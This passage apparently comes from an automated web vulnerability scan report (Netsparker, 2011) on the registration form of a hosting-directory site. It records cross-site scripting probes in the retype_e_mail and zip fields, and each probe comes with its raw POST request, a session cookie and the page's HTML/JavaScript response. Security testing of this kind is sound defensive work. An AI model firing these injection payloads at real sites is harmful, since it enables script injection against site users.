value='325A5101EE356073B122FF71CF03FB3C6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='325A5101EE356073B2321D272A2F09CBC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='325A5101EE356073250F91A63ACFAA1AC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='325A5101EE3560735E39EF44A02EBCD46F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='325A5101EE35607353DEAD80456A3DC9C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='325A5101EE356073CCF0C23832F881EC6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option value='325A5101EE356073160FDBBFD85486ACC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='325A5101EE3560737DC3A9501319989EC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='325A5101EE35607382BA6BCC4F827E97C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE356073F68A5FFA886EBF8DC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='325A5101EE35607350372E7016BFB658C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='325A5101EE35607387F0482BA0440F5BC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='325A5101EE35607387413FE2071809846F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='325A5101EE35607359E5AFF71BCC34636F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='325A5101EE35607360C74C429EBDCD3B6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
Smith
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
netsparker@example.com
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
'"--></style></script><script>alert(0x001CF7)</script>
retype_password
POST
3
state
POST
3
zip
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 560 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith©_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CF7)%3c%2fscript%3e&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:50:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='325A5101EE3560732400868C6EFB03CFC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='325A5101EE3560736D4039A680C647D16F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='325A5101EE3560738D6757CD93819AD9C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE356073945F4B4A67A0F7F9C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='325A5101EE35607382817836A7C5E2A36F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='325A5101EE356073E9D2E51936579955C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='325A5101EE356073276B7EC4A70EDB5AC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='325A5101EE356073A728FB7C9EE9F5316F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='325A5101EE356073F61C701439D4B677C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='325A5101EE356073549DCF982B336CE26F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option value='325A5101EE356073AC50F26604A970C5C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='325A5101EE35607396AA1FC105019A8DC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='325A5101EE35607365797FDCD08390C3C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE35607370D441A688D8622DC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='325A5101EE356073A1EFAE474B59B836C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='325A5101EE356073AFC128C0687DD285C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='325A5101EE3560732DDDF11256DA73686F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='325A5101EE356073136053939482E1116F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='325A5101EE356073F27FC830A245DDDD6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
Smith
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
netsparker@example.com
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
'"--></style></script><script>alert(0x001D16)</script>
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 583 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith©_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001D16)%3c%2fscript%3e
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:51:16 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" 